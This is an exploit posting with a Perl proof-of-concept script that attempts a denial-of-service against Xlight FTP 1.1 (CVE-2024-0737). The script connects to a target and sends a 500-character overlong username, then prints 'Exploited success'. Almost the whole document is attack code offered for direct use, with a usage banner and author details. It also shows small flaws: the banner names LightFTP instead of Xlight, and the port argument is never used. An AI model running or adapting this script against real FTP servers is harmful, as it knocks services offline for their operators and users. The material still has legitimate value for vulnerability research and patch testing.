Xlight FTP 1.1 – Denial Of Service (DOS)

# Exploit Title: Xlight FTP 1.1 - Denial Of Service (DOS)
# Google Dork: N/A
# Date: 22 July 2025
# Exploit Author: Fernando Mengali
# LinkedIn: https://www.linkedin.com/in/fernando-mengali/
# Vendor Homepage: https://www.xlightftpd.com
# Software Link: N/A
# Version: 1.1
# Tested on: Windows XP
# CVE: CVE-2024-0737 

  $sis="$^O";

    if ($sis eq "windows"){
      $cmd="cls";
    } else {
      $cmd="clear";
    }

    system("$cmd");
    
    intro();
    main();
    
    print "[+] Exploiting... \n";

    my $payload = "\x41"x500;    

    my $ftp = Net::FTP->new($ip, Debug => 0) or die "Não foi possível se conectar ao servidor: $@";

    $ftp->login($payload,"anonymous") or die "[+] Possibly exploited!";              

    $ftp->quit;

    print "[+] Done - Exploited success!!!!!\n\n";
  
   sub intro {
      print q {

	                            ,--,
	                     _ ___/ /\|
	                 ,;'( )__, )  ~
	                //  //   '--; 
	                '   \     | ^
	                     ^    ^

	    [+] LightFTP 1.1 - Denial of Service (DoS)

	    [*] Coded by Fernando Mengali

	    [@] e-mail: fernando.mengalli@gmail.com

      }
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0                   \n";
        exit(-1);

      }
  }